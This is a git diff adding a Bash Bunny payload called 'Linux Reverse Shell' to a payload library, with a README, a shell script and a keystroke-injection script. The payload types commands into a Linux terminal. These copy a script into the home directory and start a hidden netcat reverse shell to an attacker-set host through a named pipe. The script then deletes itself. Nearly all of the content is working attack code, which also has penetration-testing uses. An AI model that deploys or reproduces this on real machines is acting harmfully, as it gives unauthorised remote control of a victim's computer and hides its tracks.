diff --git a/payloads/library/LinuxReverseShell/README.md b/payloads/library/LinuxReverseShell/README.md new file mode 100644 index 00000000..c612ca00 --- /dev/null +++ b/payloads/library/LinuxReverseShell/README.md @@ -0,0 +1,31 @@ +# Linux Reverse Shell for Bash Bunny + +Author: tuzzmaniandevil +Version: Version 1.0 + +## Description + +With the help of ducky script, it opens a terminal window using `CTRL ALT T`. Once the window is open it will copy the script to a hidden directory in the home directory. +The script will then be executed which starts a background reverse shell, delete itself and closes the terminal window. + +Great when combined with the LAN Turtle :-) + +Example listening for the connection on linux: +`nc -nlvp 4444` + +## Configuration + +- **RHOST** The host computer to connect to +- **RPORT** The post to use for the connection + +## Requirements + +The RHOST pc must be accessible from the target machine + +## STATUS + +| LED | Status | +| ---------------- | ------------------------------------- | +| Red | Setup | +| Blue (blinking) | Executing Ducky and starting script | +| Green | Finished | diff --git a/payloads/library/LinuxReverseShell/a.sh b/payloads/library/LinuxReverseShell/a.sh new file mode 100644 index 00000000..f2de03d7 --- /dev/null +++ b/payloads/library/LinuxReverseShell/a.sh @@ -0,0 +1,10 @@ +#!/bin/bash +A="$0" +H=$1 +P=$2 +rm -rf ~/.a/ +mkdir -p ~/.a/ +mknod ~/.a/p p +/bin/sh -c /bin/sh 0<~/.a/p | nc $H $P 1>~/.a/p & +disown $! +rm -f "$A" diff --git a/payloads/library/LinuxReverseShell/payload.txt b/payloads/library/LinuxReverseShell/payload.txt new file mode 100644 index 00000000..b62dfde6 --- /dev/null +++ b/payloads/library/LinuxReverseShell/payload.txt @@ -0,0 +1,49 @@ +#!/bin/bash +# +# Title: Linux Reverse Shell +# Author: tuzzmaniandevil +# Version: 1.0 +# +# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself. +# +# Red ...............Setup +# Blue Blinking......Executing +# Green..............Finished + +# Config options +RHOST=127.0.0.1 +RPORT=4444 + +# Start Setup +LED R + +# Set Attack Mode +ATTACKMODE HID STORAGE + +LANGUAGE='us' + +# Source bunny_helpers.sh to get environment variable SWITCH_POSITION +source bunny_helpers.sh + +# Wait for Storage to mount +sleep 5 + +# Open a terminal +Q CTRL-ALT t + +# Wait for terminal to open +sleep 1 +LED B 250 + +# Copy bash script +Q STRING "cp \$(readlink -f /dev/disk/by-label/BashBunny | while read dev;do mount | grep \"\$dev\b\" | awk '{print \$3}';done)/payloads/" +Q STRING $SWITCH_POSITION +Q STRING "/a.sh ~/a.sh && chmod +x ~/a.sh && ~/a.sh $RHOST $RPORT" +Q ENTER + +# Quit the terminal +LED R G 250 +Q STRING exit +Q ENTER + +LED G